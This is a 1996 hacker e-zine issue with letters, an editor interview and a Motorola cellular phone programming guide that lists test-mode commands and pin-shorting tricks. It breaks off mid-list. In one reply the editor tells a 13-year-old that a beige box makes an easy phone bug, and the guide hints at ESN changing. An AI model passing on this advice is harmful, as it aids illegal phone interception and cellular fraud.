Copy Link
Add to Bookmark
Report
Hackers Issue 07
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, March, 1996
Edited by: Revolution
-------------------
Hackers Forums
-------------------
From the Editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution
Letters . . . . . . . . . . . . . . . . . . . . . . . . Hackers World Wide
Hackers Profile . . . . . . . . . . . . . . . . . . . . . . . . Revolution
-------------------
Technology
-------------------
The Motorola Bible . . . . . . . . . . . . . . . . . . . . . . . Anonymous
Hacking Up a Taco . . . . . . . . . . . . . . . . . .The Midnight Marauder
The PGP attack FAQ v.2.0 . . . . . . . . . . . . . . . . . . . . .infiNity
Assorted Viruses . . . . . . . . . . . . . . . . . . . . . . . . .Ted Kohl
--------------------
Politics
--------------------
VTW Cryptography Mailing . . . . . . . . . Voters Telecommunications Watch
The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution
----------------------------------------------------------------- ------------
copyright 1996 by Mike Scanlon All articles remain the property of their
authors, and may be reprinted with their permission. This zine may be
reprinted freely as a whole electronically, for hard copy rights mail the
editor. HACKERS is published monthly by Mike Scanlon, to be added to the
subscription list or to submit articles mail mrs3691@hertz.njit.edu
----------------------------------------------------------------- -------------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #1 of 9
From the Editor
Whoops! Hackers #7 was supposed to go out like three weeks ago!
Well, I've been backed up on school work, real work, whatever, you don't
want to here about it. Anyway, not much has been happening around here, so
I don't have much to say. I did not get much response at that "Best Hacks"
contest, so keep sending them in, if I don't get enough to make it worth it,
I probably won't print any of them.
For those of you who noticed, I finally got a mail script up and
running, so that annoying list of email addresses does not appear in the
beginning. I'm not sure if it is working perfectly yet, however, so if you
know of anyone who is subscribed but did not receive this issue, let me know.
Issue #7 is the biggest issue of hackers yet, topping 200kb for the
first time since issue #1. So hopefully there is more of what you like. Keep
those comments coming in!
-Revolution
* * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies. All of these articles are
provided for informational purposes only, Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #2 of 9
Letters
Date: Mon, 12 Feb 1996 10:10:09 -0500
From: Silicon Toad <jmb8902@rit.edu>
To: scanlonr@delphi.com
Subject: Mailing List - And Great Publication!
Just wanted to drop a line to say I highly respect your HACKERS
publication, it's great reading, and current info is the best. Could you
please add me to your mailing list - I'd be interested in reading the
issues as they come out...and keep up the great work! Take it easy, and
good luck with future issues.
Regards,
Silicon Toad
--
0----- Silicon Toad's Hacking Resources -----0
0--------- <jmb8902@rit.edu> ----------0
0- http://www.rit.edu/~jmb8902/hacking.html -0
[ Just thought I'd add in a letter like this to boost my ego. Don't pay
attention.
-Revolution]
----------------------------------------------------------------- --------------
From: IN%"darian@iglou.com" "Dustin Lyons" 20-FEB-1996 19:41:51.33
To: IN%"SCANLONR@delphi.com"
CC:
Subj: I wanna be a hacker..
Well, I read your zine'.. the hacker01.txt... and liked it. I am a 13
year old who wants to be a hacker when I grow up. :) And.. I was
wondering where I can get some more info, more 'basic' hacking... such as
maybe getting money from ATM's, phone bugs, etc.. any info would be
great.. Also, what are some of your major hacks?
Oh: Don't like bust me up or anything... I think I can trust you.
----------------------------------------------------------------- -------------
Dustin Lyons | darian@iglou.com
----------------------------------------------------------------- -------------
"Scratch my face with anvil hands.. and coil my tounge around a bumblebee
mouth.."
----------------------------------------------------------------- -------------
[ I'll try not to bust you up. So you want to be a hacker...robbing ATM's
may not be the best place to start. Nearly all of them are equipped with
cameras now a days, and even in the old days it was not that safe of a
business. As for bugging phones, a crude bug which is very easy to make is
simply a beige box. Instructions on how to make one of those is in Hacker's
#1. Although it does create some noise, it probably won't matter unless you're
bugging somebody who knows what they are doing. For more proffesional bugs,
there is an http site at www.tscm.com, or www.tcsm.com, with some good bugging
info. As for my major hacks?
Hmmm..... :)
-Revolution]
----------------------------------------------------------------- --------------
>From sandrews@avalon.nf.caThu Feb 22 14:40:54 1996
Date: Wed, 14 Feb 1996 18:47:03 -0330 (NST)
From: oTHeLLo <sandrews@avalon.nf.ca>
To: mrs3691@hertz.njit.edu
Subject: great stuff
I've just finished reading issue #5 of HACKERs.... it's great. I've
learned so much and somehow it offers more than other zines.
I just wanna say thanx and ask to be added to the subscription list.
Also, i've had trouble finding issues #6 to 8. Any idea where to find
them? i've look on your homepage and at Kl0ns homepage but still no luck..
again, thanx.. now maybe I can fix some of those security loopholes on
linux machine.. *grin*
[I don't know how this rumor got started, but obviously issue #7 of Hackers
is the most recent one. Just wanted to clear up any misconceptions.
-Revolution]
----------------------------------------------------------------- --------------
sandrews@skyline.avalon.nf.ca
>From sean@wheel.dcn.davis.ca.usSun Feb 4 18:20:49 1996
Date: Fri, 2 Feb 1996 20:19:07 -0800 (PST)
From: Sean Logan <sean@wheel.dcn.davis.ca.us>
To: mrs3691@hertz.njit.edu
Subject: Need advice for hacking page
Hey,
I recently put online a hacking page I've been working on for over a
month (the url is in my sig). And seeing as how your zine is so cool, I
thought you might have some advice or suggestions for me. What can I
expect from my service provider about the page? (are they going to
fuss?). Where can I get good, up-to-date material for it? Anything I
should *not* do on the page?
Thanks in advance,
~~
Sean Logan <sean@wheel.dcn.davis.ca.us>
http://wheel.dcn.davis.ca.us/~sean/hack/hack.html
"There's no 'them' -- it's all us"
[As for good, up-to-date material, I would check out the Phrack page, probably
the best compilation of underground sites. As for what definetly not to do,
I would say the only definite thing is don't post any codes, or passwords,
credit card numbers, anything obviously illegal. As for what your provider
will do, there is no way to say. The best bet would be to just put up the
page quietly, and if your provider has a problem with it, then think about
revising it.
-Revolution]
----------------------------------------------------------------- --------------
>From born2run@magi.comFri Mar 1 14:26:46 1996
Date: Fri, 1 Mar 1996 12:15:54 -0500 (EST)
From: born2run <born2run@magi.com>
To: michael r scanlon cis stnt <mrs3691@hertz.njit.edu>
Subject: Re: Hackers #6
>* * * * * * * * * * * * * * * * * * * *
>
> -= H A C K E R S =-
>
> Issue #6, February, 1996
>
> Edited by: Revolution
>
Thanks for the copy (the #6:1/3, #6:2/3 and #6:3/3).
Sorry it took so long to get back to you.
With you permission I'd like to hand out a hard copy of #6
to the people attending the Ottawa Ontario (613) "2600"
meeting.
I have one hard copy, I'll pass it around I guess.
The stuff on the Flip Fone was particularly interesting.
Any more on that kind of thing?
Thanks,
Rob.
[ Yeah, this issue has some more on that kind of thing. :)
Printing out hard copies and giving them out is fine, as long as they stay
whole, and are not charged for in any way.
-Revolution]
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #3 of 9
Hackers Profile: Revolution
I've been toying with doing something like this, a bit of a play off
of Phrack's Phrack profiles, for a long time. I've never gotten around to it,
I guess, but when this person mailed me with this questionairre, I figured I
would include it. It is a bit conceited, I guess, to include my interview in
the mag, but I figure it is my mag, so shouldn't you get to know the editor
first?
Anyway, this questionairre was sent to me by a college student from
Florida who is working on a report about the computer underground subculture.
Hopefully from this interview you will realize a bit of my philosophy on the
subject.
Before we begin, please type the handle you would like to be
called:
Revolution.
Hacker Questions:
1) How would you define the word "hacker?"
Someone skilled in programming and the creation of algorithms, who
has a special skill for coming up with interesting bits of code and
unique solutions to problems. Also may specifically apply to one
who is particularly interested in operating systems and the way
they protect system resources, bordering on obsession. One who
enjoys fiddling with new systems, sometimes over stepping the rules
of common courtesy, but never with evil intentions.
Here I would have included another question, perhaps the definition
of the word "cracker." This person I would describe as someone who
breaks into computer systems with the express goal of destroying
data or other less than legal activities. As the cracker is
normally not such an intelligent breed, they may often use the
techniques of hackers, but the reasons and ways they go about what
they do are definetly not to be mistaken for the ways of hackers.
2) What is it that you do as a hacker?
The above. I have never gotten anything out of hacking except the
fun of it. I have never stolen anything from a system exept
knowledge.
I suppose under this heading I might include that I spend as many
of my waking hours as possible in front of a computer screen, but
I do not do this as a hacker. I do this as Mike Scanlon, a self
labeled computer geek.
3) Is there any special jargon used by hackers to communicate?
Please give examples.
Besides the English language, I would say the jargon included in
most computer reference guides, Unix operating system manuals,
HTML, VRML, and JAVA reference guides.
I think what you meant by this question was what jargon is used by
"crackers" to communicate. This jargon is both irrelavant and
meaningless. Anyone can spell things with numbers and strange
characters, this has nothing to do with hacking. As social
phenomena, hacking and cracking are two totally different things.
Hacking is for the love of knowledge, a hobby, it is not inherently
a social phenomenon, but an individual endeavor. Cracking, on the
other hand, is often practiced by misguided delinquents who need
some sort of identity, and often turn to this 3l33t jargon to feel
as though they are a part of something. I would not refer to this
jargon in any way as hacker jargon.
4) How did you learn to become a hacker?
I did not learn anything. I was born a hacker. It's part of the
"way I am wired" (taken from Daemon9's sig :) I enjoy playing
around with code, its a hobby of mine. So is experimenting with
the security of operating systems. Because I enjoy it, I tend to
learn more about it. I just picked up a manual, read a few
newsgroups, and went out and experimented with the stuff.
5) How do hackers communicate with one another?
Hackers communicate as normal humans do, although do to their
common interest with computers, they may communicate using online
means such as email, or news groups. I myself tend to shy away
from irc for anything but entertainment.
6) What is 2600?
2600 is the frequency that dead trunks put out, and was also the
frequency of the "blue box," a device used in the good old days to
acquire free phone calls. It is also for the same reason the name
of a highly regarded magazine, "2600 Hz, the hacker quarterly."
This magazine is the only hacker zine I know of that is put out in
hard copy. Along with Phrack, an email zine, it ranks as the most
famous hacker publication. 2600 has also prompted a voice BBS of
the same name, and countless newsgroups of arguable content.
7) Do hackers collect themselves into groups? If so, what are the
groups?
As I said, hacking is not an inherently social phenomenon. Hacking
is not about gangs of terrorists wreaking havoc on the net, as some
media moguls would have us believe, but much the opposite. Of
course, as in any other hobby, Hackers naturally do form groups.
The largest and most notable of these being the ACM. The IEEE also
could be seen as being largely a "hacking" group. Of course, these
two societies are far away from being what the media would like to
term a "hacker" group, but never the less, they are what they are.
"Cracking" groups are something I am not too well versed on, I
suppose the LoD, MoD, NoD, KoD, BoW, and the rest might qualify in
some respects as such. A hacking group I have had some experience
with which is not a professional society is the guild, but tales of
that group deal much to much with aspects of real computing and too
little with the glories of "cracking," as to be uninteresting to
most who are looking for ATM hacking and swiss bank robbing
stories.
8) How does a hacker "hack?"
How does a skateboarder skateboard? How do you ride a bicycle?
What is it like to feel drunk? One can never understand unless one
already understands. I could describe to you thousands of bugs
which will allow you access to numerous computers running a variety
of operating systems, but if I do so, will I have truly taught you
to hack? Is there anything to hacking besides the actions, or is
there an underlying spirit that cannot be taught, only experienced?
In my opinion there is. One can perform the actions without the
spirit, but then one is not a hacker. Of course, one cannot have
the spirit and help but perform the actions. That is the spirit of
being a hacker.
9) Please describe your daily activities as a hacker.
I get up, shower, go to class, hit on ninety percent of the girls
I see, kick myself for not hitting on the other ten percent, go to
the fraternity house and drink too much, do home work, and go to
sleep. Oh yeah, I also spend a couple hours on the internet.
There I normally work on my zine, my 3w projects, and read a few
mailing lists, like bugtraq, CERT, 8lgm. And, of course, I
experiment a little on the machines at school and abroad, checking
out what holes work and what ones don't, and I try and poke some
holes of my own.
10) Describe the average hacker.
The average hacker is human, lives on the planet Earth, and has
eaten at least one white castle burger in his or her life. They
also normally have access to a computer with or without an internet
hook up, which they feel an amazing intimacy with. They normally
spend more than a few hours on this machine during which they
experience a feeling of pure ecstasy until they realize they will
eventually have to go offline for enough time to eat and sleep, and
deal with the rest of the waking world. Contrary to popular
belief, the average hacker will never wind up in jail, nor does he
represent any sort of threat to the public, unless you happen to be
an overworked computer security professional with no sense of
humor.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #4 of 9
***************************************************************** ***************
* *
* THE MOTOROLA BIBLE *
* For all Cellular AND Pager Info *
* *
* MOTOROLA USERS AND PROGRAMMING GUIDES *
* *
* Ver. 2.0 ************
* * 12/23/95 *
***************************************************************** ***************
Table of Contents:
Section 1 Introduction 7 Phone Pin Outs
2 General User Info 8 Cable Specs
3 Programming Info 9 Channel Number vs. Frequency
4 Test Mode 10 Trik Clip
5 Hacking the FOVC 11 Pager Info
6 Reading the SID 12 Disclaimer
I*N*T*R*O*D*U*C*T*I*O*N****************************************S* E*C*T*I*O*N***1
After much deliberation, I decided to include information about
Motorola's pagers and their test mode commands. Since pagers aren't as much
fun as cellular, along with the fact there isn't much to them, this information
is very limited and somewhat brief. I would still like all information
pertaing to all of Motorola's pagers sent to me so this file can stay current.
GENERAL DISCLAIMER:
This manual is not intended to be an aid in cellular fraud. That is
both illegal and immoral. Would you like someone to make charges on your
phone? If you want free calls, you want to check elsewhere for information
pertaining to BOXES, which is NOT mentioned in the Motorola Bible.
This manual is not intended for use by people with little electronics
experience. This is not a tutorial and not intended to be used except by
people with previous cellular experience and are familiar with programming
cellular phones. There are tons of introductory files all over the net. For
more info get into alt.cellular or alt.2600. If you have specific questions,
those are the places to start.
If you have any additions are corrections about this manual, please
email me at:
quinton.mchale@scinexus.com
p.s. I hope to make this manual more international. However, the U.S.
cellular system greatly differs from other countries and we are all
ignorant here to what others are doing (but isn't that ALWAYS the way?).
Any info on hacking the GSM system (at least being able to use different
SIM cards in different phones). The term is 'SIM locked' and a friend
needs to unlock his phone. Please Email ANY info about this.
Send all related info about the new phones with caller ID - Manuals,
instructions, bugs, etc.
p.s.s. If anyone has ANY type of cellular monitoring software that is
P.C. based (using a scanner and/or Motorola Bag phone) EMAIL me
immediately!
----------------------------------------------------------------- ---------------
************************************************************
* CHECK OUT THE NEW HOME ON THE WEB OF THE MOTOROLA BIBLE! *
************************************************************
This is a kick-ass sight with general info (all phones), cable specs,
software, and other cool stuff. All updates will be posted here first!
http://www.primenet.com/~mtorola
When you get there, send him Email and tell him you saw the site listed here
in the Bible.
G*E*N*E*R*A*L***U*S*E*R***I*N*F*O******************************S* E*C*T*I*O*N***2
Before going in to the programming of the cellular phone, it is
important for the user to know the normal things necessary for day to day
operation. While the majority of the stuff in the users manual is intended
for people that have problems programming their VCR, their are a few things
that are very important and are only mentioned in the users manual.
Turn On: [Pwr]
Place Call: Enter number, [Snd]
Receive Call: [Snd] or open flip fone
End Call: [End] or close flip fone
Store Number: Phone number, [Sto], 2-digit location number
Recall Number: [Rcl], 2-digit location number
Super Speed Dialing: Directory location number, [Snd]
Changing Entries: Press [Rcl] and the 2-digit location number
so that the number to be changed is
displayed. Press and release [Clr] to back
out each of the digits. Enter a new number
and press [Sto].
Call Number Displayed: [Snd]
Microphone Muting: Press [Fcn], [6].
To unmute, press [Fcn], [6]
Lock Unit: [Fcn], [5] or [LOCK]
Unlock: Three digit unlock code. If you make an
error, [Clr] and enter again.
Automatic Lock: [FCN], [6] (not all phones)
"EnAbLE" will appear if compatible.
Display Unlock Code: Press [Fcn], [0], your six-digit security
code, [Rcl].
Changing Your Unlock Code: Press [Fcn], [0], your six-digit security
code, your NEW 3-digit unlock code, [Sto].
Review Battery Meter: Press [Fcn], [4] and release.
Adjust Volume: Earpiece - Press and hold [Vol] to increase.
Release, press again to decrease.
Ringer - [Fcn], then Vol as above.
Recall Last Number Used: [Rcl], [0], [0]
Recall Own Phone Number: [Rcl], [#]
Individual Call Timer: [Rcl], [#], [#]
Resettable Call Timer: [Rcl], [#], [#], [#]
Reset Resettable Call Timer: [Fcn], [0], [7], [Clr]
Cumulative Call Timer: [Rcl], [#], [#], [#], [#]
Access Features: Press [Fcn], [1]. To change features, press
[*] and [#] to scroll and [Clr] to change.
To exit feature menu, press [END].
Review/Scroll Menu Features: Press [*] or [#]
Status Review: [Fcn], [0], [9], [Rcl], [#] or [*] scrolls
messages. To end press [END].
Changing System Type: Press [Rcl], [*]. Repeatedly press [*]
until the desired system type appears. To
select press [Sto].
Outgoing Call Restrictions: Press [Fcn], [0], 6-digit security code,
[1], [Sto]. Phone will place calls only
from memory locations 1-10.
To change back to unrestricted dialing
press [Fcn], [0], 6-digit security code,
[4], [Sto].
I would like to add that while I have extensively worked on finding
additional test mode commands, I (nor anyone else) have never worked with the
normal operation commands as listed above. For example, above you will
notice sequences with [Fcn], [1] or [Fcn], [0], [7]. This is totally
unexplored teritory. Happy hacking :) See entering test mode on the new
95xx phones.
P*R*O*G*R*A*M*M*I*N*G***I*N*F*O********************************S* E*C*T*I*O*N***3
NOTES: Some units have dual NAM's.
The ESN prefix is 130 decimal, 82 hex.
Motorola: 1-800-331-6456
There are MANY different models of Motorola phones sold under various
brand names, if you think it's a Motorola, it probably is.
Determine which access sequence to use:
HAND HELD PORTABLE MODELS
If the phone has a FCN button and no MENU button use sequence 1.
If the phone has no FCN button use sequence 2.
If the phone has a MENU button and a FCN button use sequence 4.
INSTALLED MOBILE PHONES AND TRANSPORTABLE MODELS
If the phone has no FCN button and no RCL button use sequence 3.
If the phone has a FCN button use sequence 4.
If the phone has a MEM button use sequence 5.
If the phone has a RCL button and no FCN button use sequence 6.
SEQUENCE# ACCESS CODE
1 FCN (SECURITY CODE TWICE) RCL
2 STO # (SECURITY CODE TWICE) RCL
3 CTL 0 (SECURITY CODE TWICE) *
4 FCN 0 (SECURITY CODE TWICE) RCL
5 FCN 0 (SECURITY CODE TWICE) MEM
6 CTL 0 (SECURITY CODE TWICE) RCL
The default security code is 000000. The CTL (control) button is the
single black button on the side of the handset.
NAM programing:
1. Turn the power on.
2. Within ten seconds enter the access sequence as determined above.
3. The phone should now show "01" in the left of the display, this is the
first programing entry step number. If it does not the security code
is incorrect, or the programing lock-out counter has been exceeded. In
either case you can still program the unit by following the steps under
TEST MODE PROGRAMING below.
4. The * key is used to increment each step:
Each time you press * the display will increment from the step number,
displayed on the left, to the data stored in that step, displayed on
the right. When the data is displayed make any necessary changes and
press * to increment to the next step number.
5. The SND key is used to complete and exit programing when any STEP
NUMBER is displayed.
If you have enabled the second phone number bit in step 10 below then
pressing SND will switch to NAM 2. Steps 01 thru 06, 09 and 10 will
repeat for NAM 2, the step number will be followed by a "2" to indicate
NAM two.
5. The CLR key will revert the display to the previously stored data.
6. The # key will abort programing at any time.
PROGRAMING DATA:
STEP# #OF DIGITS/RANGE DESCRIPTION
01 00000 - 32767 SYSTEM ID
02 3 DIGITS AREA CODE
03 7 DIGITS TEL NUMBER
04 2 DIGITS STATION CLASS MARK
05 2 DIGITS ACCESS OVERLOAD CLASS
06 2 DIGITS GROUP ID (10 IN USA)
07 6 DIGITS SECURITY CODE
08 3 DIGITS LOCK CODE
09 0333 OR 0334 INITIAL PAGING CHANNEL
10 6 DIGIT BINARY OPTION PROGRAMING (SEE NOTE 1)
11 3 DIGIT BINARY OPTION PROGRAMING (SEE NOTE 2)
NOTES:
Take care with Motorola's use of "0" and "1". Some options use "0" to
enable, some use "1".
1. This is a 6 digit binary field used to select the following options:
Digit 1: Internal handset speaker, 0 to enable.
Digit 2: Local Use Mark, 0 or 1.
Digit 3: MIN Mark, 0 or 1.
Digit 4: Auto Recall, always set to 1 (enabled).
Digit 5: Second phone number (not all phones), 1 to enable.
Digit 6: Diversity (Two antennas, not all phones), 1 to enable.
2. This is a 3 digit binary field used to select the following options:
Digit 1: Continuous DTMF, 1 to enable.
Digit 2: Transportable Ringer/Speaker, 0=Transducer, 1=Handset.
Digit 3: 8 hour time out in transportable mode, 0 to enable.
On newer models, they have added and changed some numbers. The numbers
as of the 3/27/92 manual are as follows:
1. The 6 digit binary field is still the same.
2. The 3 digit binary field has become a 5 digit binary field.
Digit 1: Failed Page Indicator 1=Disabled;0=Enabled
Digit 2: Motorola Enhanced Scan 1=Enabled; 0=Disabled
Digit 3: Long Tone DTMF 1=Enabled; 0=Disabled
Digit 4: Transportable Internal Ringer Speaker 1=Handset; 0=Transdcr
Digit 5: Eight Hour Timeout 1=Disabled;0=Enabled
T*E*S*T***M*O*D*E**********************************************S* E*C*T*I*O*N***4
TEST MODE ACCESS:
NEWER 95xx PHONES (Thank you Motorola!!!)
Many newer phones don't require grounding. If your software version number
is 9526 (I think) or newer, enter this:
FCN + 0 + 0 + * + * + 8 3 7 8 6 6 3 3 + STO
In case you have trouble remembering the number sequence, it spells out
"TESTMODE." Leave it to Motorola to make this easier and easier all the time.
I have used this and it does work. This command just backs up my claim even
furthar that esn changing via handset is a reality. It's a matter of finding
the correct combination of keys.
Normal test mode commands work like usual from then on.
For some odd reason, this hasn't been included in all the 95xx phones. I
believe they started it in Software 9526. This is only an estimate, so if
you have a 95xx flip, let me know what software version you have and whether
it works or not so this date can be isolated. Mine is a 9562 that worked.
INSTALLED MOBILE PHONES AND TRANSPORTABLE MODELS
To enter test mode on units with software version 85 and higher you must
short pins 20 and 21 of the transceiver data connector. An RS232 break out
box is useful for this, or construct a test mode adaptor from standard
Radio Shack parts.
For MINI TR or Silver Mini Tac transceivers (smaller data connector) you
can either short pins 9 and 14 or simply use a paper clip to short the
hands free microphone connector.
HAND HELD PORTABLE MODELS:
There are two basic types of Motorola portable phones, the Micro-Tac series
"Flip" phones, and the larger 8000 and Ultra Classic phones. Certain newer
Motorola and Pioneer badged Micro-Tac phones do not have a "flip", but
follow the same procedure as the Micro-Tac.
8000 & ULTRA CLASSIC SERIES:
If you have an 8000 series phone determine the "type" before trying to
enter test mode. On the back of the phone, or on the bottom in certain
older models, locate the F09... number this is the series number. If the
FOURTH digit of this number is a "D" you CAN NOT program the unit through
test mode, a Motorola RTL4154/RTL4153 programer is required to make any
changes to this unit.
Having determined that you do not have a "D" series phone the following
procedure is used to access test mode:
Remove the battery from the phone and locate the 12 contacts at the top
near the antenna connector. These contacts are numbered 1 through 12 from
top left through bottom right. Pin 6, top right, is the Manual Test Mode
Pin. You must ground this pin while powering up the phone. Pin 7 (lower
left) or the antenna connector should be used for ground. Follow one of
these procedures to gain access to pin 6:
1. The top section of the battery that covers the contacts contains
nothing but air. By careful measuring you can drill a small hole in the
battery to gain access to pin 6, alternately simply cut the top off the
battery with a hack saw. Having gained access use a paper clip to short
pin six to the antenna connector ground while powering up the phone.
2. If you do not want to "destroy" a battery you can apply an external 7.5
volts to the + and - connectors at the bottom of the phone, ground pin 6
while powering up the phone as above.
3. You can also try soldering or jamming a small jumper between pins 6 and
7 (top right to lower left), or between pin 6 and the antenna connector
housing ground. Carefully replace the battery and power up the phone. Use
caution with this method not to short out any other pin.
4. A cigarette lighter adaptor, if you have one, also makes a great test
mode adaptor as it can be disassembled to give you easier access to pin 6.
Many are pre marked, or even have holes in the right location. This is
because they are often stamped from the same mold that the manufacturer
uses for making hands free adaptor kits and these kits require access to
the phone's connectors.
ULTRA CLASSIC II SERIES:
Ground Pin 2 to pin 4.
MICRO-TAC "FLIP" SERIES:
This phone follows similar methods as outlined for the 8000 series above.
Remove the battery and locate the three contacts at the bottom of the
phone, the two outer contacts are raised and connect with the battery. The
center contact is recessed, this is the Manual Test Mode connector.
Now look at the battery contacts, the two outer ones supply power to the
phone, the center contact is an "extra" ground. This ground needs to be
shorted to the test mode connector on the phone. The easiest way to do
this is to put a small piece of solder wick, wire, aluminum foil or any
other conductive material into the recess on the phone. Having done this
carefully replace the battery and turn on the power, if you have been
successful the phone will wake up in test mode.
GENERAL NOTES:
HANDSETS: Most Motorola handsets are interchangeable, when a handset is
used with a transceiver other than the one it was designed for the display
will show "LOANER". Some features and buttons may not work, for instance
if the original handset did not have a RCL or STO button, and the
replacement does, you will have to use the control * or control # sequence
to access memory and A/B system select procedures.
LOCK/UNLOCK PROCEDURES:
Phones with "LOCK" buttons: Press lock for at least 1/2 a second.
Phones with a "FCN" button: Press FCN 5, note that 5 has the letter's
"J,K, and L" for lock.
Phones with no FCN or LOCK button: Press Control 5, control is the black
volume button on the side of the
handset.
SYSTEM SELECT PROCEDURES:
Phones with a RCL button: Press RCL *, then * to select, STO to store.
Phones with no RCL button: Press Control * then * to select, # to store.
Options are: CSCAn: Preferred/Non preferred with system lockout.
Std A/b, or Std b/A: Preferred/Non preferred.
SCAn Ab, or SCAn bA: Non preferred/Preferred
SCAn A: "A" ONLY
SCAn b: "B" ONLY
HOME: Home only
(these are typical options, some phone's vary. C-Scan is only available
on newer models and does not appear unless programed, see below.)
----------------------------------------------------------------- ---------------
TEST MODE
NOTE: Not all commands work on all telephones. If a command is not valid the
display will show "ErrOr." Not all numbers have been assigned. Not all
numbers have been listed here. Some commands were intended only for
Motorola factory applications. (This is the disclaimer in the
technical training manual. I have included all of the other commands I
have discovered one way or another. Some that say no function do have
a function but it is unknown until it is figured out.)
Three test commands are significant for programming and registering the
the telephone for service: see full descriptions under TEST MODE COMMANDS.
32# Clears the telephone. (Older Motorola allowed either three or fifteen
changes in the MIN. After that, the phone had to be sent to Motorola to reset
the counter. This is the command they use.)
38# Displays the ESN
55# This is the TEST MODE PROGRAMMING (as described below).
TEST MODE COMMANDS:
# Enter Test Command Mode
00# no function
01# Restart (Re-enter DC power start-up routine.) On TDMA telephones, this
command has the same effect as pressing the PWR button.
02# Display Current Telephone Status (This is a non-altering version of the
STATUS DISPLAY. On a 14 character display, all the information is shown.
On a 7 character display only the information on the second line of a 14
character display is shown. On a 10 character display, all the
information on the second line of a 14 charcter display plus the last
three characters of the first line are shown.)
STATUS DISPLAY, ALTERNATES BETWEEN:
AAA BBB AAA = Channel Number (decimal) BBB = RSSI reading for channel
CDEFGHI are as follows:
C = SAT frequency (0=5970, 1=6000, 2=6030, 3=no channel lock)
D = Carrier (0=off, 1=on)
E = Signalling tone (0=off, 1=on)
F = Power attenuation level (0 through 7)
G = Channel mode (0=voice channel, 1=control channel)
H = Receive audio mute (0=unmuted, 1=muted)
I = Transmit audio mute (0=unmuted, 1=muted)
Press * to hold display and # to end.
03# Reset Autonomous Timer. This command results in the reset of the
autonomous timer but does not provide any test function on these models.
04# Initializes Telephone to Standard Default Conditions:
Carrier Off, Power Level 0, Receiver Audio Muted, Transmit Audio Muted,
Signalling Tone Off, SAT Off, Resetting of Watch-Dog Timer Enabled,
DTMF and Audio Tones Off, Audio Path Set to Speaker
05# TX Carrier On (Key Transmitter)
06# TX Carrier Off
07# RX Audio Off (Mute Receiver Audio)
08# RX Audio On (Unmute Receiver Audio)
09# TX Audio Off
10# TX Audio On
11(Ch.No.)# Set Tranceiver to Channel xxxx (Receive and Transmit in Decimal;
accepts 1, 2, 3, or 4 digits)
see end of file for more info on this command
12x# Set Power Step to x; (0,1-7) 0=Maximum Power (3 Watts) 7=Minimum Power Out
13# Power Off (Shuts off the radio)
14# 10 kHz Signalling Tone On
15# 10 kHz Signalling Tone Off
16# Setup (Transmits a five word RECC message; each of the five words will
be "FF00AA55CC33." Transmitter de-keys at the end of the message.)
17# Voice (Transmits a two word REVC message; each of the two words will be
"FF00AA55CC33." Transmitter de-keys at the end of the message.)
18# C-Scan (Allows for entry of as many as 5 negative SID's for each NAM.)
Newer Motorola phones are equipped with a feature called C-Scan, this is
an option along with the standard A/B system selections. C-Scan allows
the phone to be programed with up to five inhibited system ID's per NAM.
This is designed to prevent the phone from roaming onto specified non-home
systems and therefore reduce "accidental" roaming fees.
1. C-Scan can only be programed from test mode, power phone up with the
relevant test mode contact grounded (see above).
2. Press # to access test mode.
3. Press 18#, the phone will display "0 40000".
4. Enter the first inhibited system ID and press *.
Continue to enter additional system ID's if required. After the 5th entry
the phone will display "N2". Press * to continue and add system ID's for
NAM 2 as required.
5. If an incorrect entry is made (outside the range of 00000-32767) the
display will not advance, press CLR and re-enter. Use a setting of
40000 for any un-needed locations.
6. When the last entry has been made press * to store and press # to exit,
turn off power.
or
[**Phones without the C-Scan option used this command to SEND NAM.**]
18# SEND NAM. Display shows AA BB. Where AA=Address and BB=Data. Displays
the contents of the NAM, one address at a time, advanced by pressing the
* key. The following data is contained in NAM. The test is exited by
depressing the # key.
SIDH Sec. Code
OPT. (1,2,&3) MIN
MIN1, MIN2 FCHNA
SCM FCHNB
IPCH NDED
ACCOLC CHKSUM GIM
19# Display Software Version Number (4 digits displayed as year and week)
NOTE: Entering commands 20# through 23# or 27# causes the tranceiver to begin
a counting sequence or continous transmission as described below. In
order to exit from the commands to enter another test command, the #
key must be depressed; all other key depressions are ignored.
20# Receive control channel messages counting correctable and uncorrectable
errors. When the command starts, the number of the command will be
displayed in the upper-right corner of the display. Entering a # key
will terminate the command and display two three-digit numbers in the
display. The first number is the number of correctable errors and the
second is the uncorrectable errors.
21# Received voice channel messages counting correctable and uncorrectable
errors. When the command starts, the number of the command will be
displayed in the upper right-hand corner of the display. Entering a #
key terminates the command and will display two three-digit numbers in
display. The first is the number of correctable errors and the second
is the uncorrectable errors.
22# Receive control channel messages counting word sync sequence. When the
command starts, the number of the command will be displayed in the upper
right-hand corner of the display. Entering a # key will terminate the
command and display the number of word sync sequences in the display.
23# Receive voice channel messages counting word sync sequences. When the
command starts, the number of the command will be displayed in the upper
right-hand corner of the display. Entering a # key will terminate the
command and display the number of word sync sequences in the display.
24# Receive control channel data and display the majority voted busy/idle
bit. 0=idle 1=busy
25x# SAT On When x=0, SAT=5970HZ
x=1, SAT=6000HZ
x=2, SAT=6030HZ
26# SAT Off
27# Transmit Data (Transmits continuous control channel data. All words
will be "FF00AA55CC33." When the command starts, '27' will be displayed
in the right side of the display. Entering a # key will terminate the
command. The transmitter de-keys when finished.)
28# Activate the high tone (1150 Hz +/- 55 Hz)
29# De-activate the high tone
30# Activate the low tone (770 Hz +/- 40 Hz)
31# De-activate the low tone
32# Clear (Sets non-volatile memory to zeroes or factory default. This
command will affect all counters, all repertory memory including the last
number called stack, and all user programmable features including the
setting of System Registration. It does not affect the ESN, NAM, phasing
data, or lock code. This takes a minute or so. DO NOT TURN OFF THE
TELEPHONE WHILE THIS IS SHOWING '32' ON THE DISPLAY. WAIT UNTIL THE
NORMAL SERVICE LEVEL DISPLAY RESUMES!)
33x# Turn on DTMF for x (1-9, *, 0, #, plus the single tones)
Where x=1 697 Hz + 1209 Hz 14 1150 HZ (not used in cellular)
2 697 Hz + 1336 Hz 15 1209 Hz
